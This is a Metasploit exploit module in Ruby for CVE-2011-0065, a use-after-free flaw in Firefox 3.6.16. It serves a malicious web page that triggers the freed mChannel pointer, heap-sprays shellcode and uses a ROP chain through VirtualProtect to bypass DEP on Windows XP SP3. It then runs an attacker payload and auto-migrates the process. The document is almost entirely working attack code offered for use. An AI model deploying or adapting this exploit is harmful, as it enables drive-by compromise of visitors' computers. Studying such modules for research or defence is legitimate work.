Mozilla Firefox 3.6.16 mChannel Use After Free Exploit

`require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
#  
# This module acts as an HTTP server  
#  
include Msf::Exploit::Remote::HttpServer::HTML  
  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::FF,  
:ua_minver => "3.6.16",  
:ua_maxver => "3.6.16",  
:os_name => OperatingSystems::WINDOWS,  
:javascript => true,  
:rank => NormalRanking,  
})  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit',  
'Description' => %q{  
This module exploits an use after free vulnerability in Mozilla  
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the  
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel  
becomes a dangling pointer and can be reused when setting the OBJECTs  
data attribute. (Discovered by regenrecht). This module uses heapspray  
with a minimal ROP chain to bypass DEP on Windows XP SP3  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'regenrecht', # discovery  
'Rh0' # wrote metasploit module  
],  
'Version' => '0.0',  
'References' =>  
[  
['CVE', '2011-0065'],  
['OSVDB', '72085'],  
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=634986'],  
['URL', 'http://www.mozilla.org/security/announce/2011/mfsa2011-13.html']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
'InitialAutoRunScript' => 'migrate -f',  
},  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "",  
},  
'Targets' =>  
[ # worked with 100% reliability  
[ 'Firefox 3.6.16, Windows XP SP3 (VirtualBox 4)',  
{  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
}  
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'May 10 2011'  
))  
end  
  
def on_request_uri(cli, request)  
  
# Re-generate the payload  
return if ((p = regenerate_payload(cli).encoded) == nil)  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })  
  
# Handle the payload  
handler(cli)  
end  
  
def generate_html(payload)  
  
# DEP bypass  
custom_stack = [  
0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8  
0x7c801ad4, # VirtualProtect  
0xbeeff00d,  
0xbeeff00d,  
0x7c874413, # jmp esp  
0x0c0c0048, # start address  
0x00000400, # size 1024  
0x00000040, # Page EXECUTE_READ_WRITE  
0x0c0c0c00 # old protection  
].pack("V*")  
  
payload_buf = ''  
payload_buf << custom_stack  
payload_buf << payload  
escaped_payload = Rex::Text.to_unescape(payload_buf)  
  
custom_js = %Q|  
  
e = document.getElementById("d");  
e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)  
fake_obj_addr = unescape("\\x0c%u0c0c")  
  
// taken and modified from adobe_flashplayer_newfunction.rb  
var sc = unescape("#{escaped_payload}")  
var ret_addr = unescape("%u0024%u0c0c")  
while(ret_addr.length+20+8 < 0x100000) {ret_addr += ret_addr}  
var b = ret_addr.substring(0,(0x48-0x24)/2)  
b += sc  
b += ret_addr  
var next = b.substring(0,0x10000/2)  
while(next.length<0x800000) {next += next}  
var again = next.substring(0,0x80000 - (0x1020-0x08)/2)  
array = new Array()  
for (n=0;n<0x1f0;n++){  
array[n] = again + sc  
}  
  
e.data = ""  
|  
  
return %Q|  
<html>  
<body>  
<object id="d"><object>  
<script type="text/javascript">  
#{custom_js}  
</script></body></html>  
|  
end  
  
end  
  
`